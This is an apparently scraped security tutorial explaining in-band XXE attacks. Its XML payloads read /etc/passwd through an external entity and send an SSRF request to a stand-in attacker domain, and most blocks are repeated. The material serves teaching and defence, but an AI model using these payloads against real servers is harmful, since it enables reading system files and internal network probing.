What is In-Band XXE?
What is In-Band XXE?
When the XXE attack receives the results in the same band, it is called In-Band XXE. In-Band XXE is easy to exploit and an attacker can retrieve the server's internal files or executes commands on the server's shell.
Examples:
Let's understand XXE with a basic example. Please assume that an application of a college is having a filter option and the following XML file is used as an input to an insecure parser:
Examples:
Let's understand XXE with a basic example. Please assume that an application of a college is having a filter option and the following XML file is used as an input to an insecure parser:
<?xml version="1.0" encoding="UTF-8"?>
<filter>
<semester>3</semester>
<branch>CE</branch>
</filter>
<?xml version="1.0" encoding="UTF-8"?>
<filter>
<semester>3</semester>
<branch>CE</branch>
</filter>
<filter>
<semester>3</semester>
<branch>CE</branch>
</filter>
Example 1: Retrival of the server's internal files.
Example 1: Retrival of the server's internal files.
If server is parsing this file insecurly on server-side, an attacker can provide following payload to exploit the XXE:
If server is parsing this file insecurly on server-side, an attacker can provide following payload to exploit the XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!Entity brn SYSTEM "file:///etc/passwd">]>
<filter>
<semester>3</semester>
<branch>&brn;</branch>
</filter>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!Entity brn SYSTEM "file:///etc/passwd">]>
<filter>
<semester>3</semester>
<branch>&brn;</branch>
</filter>
An attacker has injected an external entity named "brn' and when server will parse the XML file brn variable will load password file of linux file system as shown in example below:
An attacker has injected an external entity named "brn' and when server will parse the XML file brn variable will load password file of linux file system as shown in example below:
Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Example 2: Perform SSRF attacks
If server is parsing this file insecurly on server-side, an attacker can provide following payload to perform the SSRF attack:
Example 2: Perform SSRF attacks
If server is parsing this file insecurly on server-side, an attacker can provide following payload to perform the SSRF attack:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!Entity brn SYSTEM "http://www.attackercontrolleddomain.com/"> ]><filter>
<semester>3</semester>
<branch>&brn;</branch>
</filter>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!Entity brn SYSTEM "http://www.attackercontrolleddomain.com/"> ]><filter>
<semester>3</semester>
<branch>&brn;</branch>
</filter>
When variable brn is resolved by the XML parser, an HTTP request will be sent to the attacker-controlled server. Once an attacker receives the request from the XML parser, the vulnerability is confirmed. Now the attacker can provide SSRF payloads to perform port scanning or internal file retrieval.
When variable brn is resolved by the XML parser, an HTTP request will be sent to the attacker-controlled server. Once an attacker receives the request from the XML parser, the vulnerability is confirmed. Now the attacker can provide SSRF payloads to perform port scanning or internal file retrieval.
Reference:
Reference:
0 Comments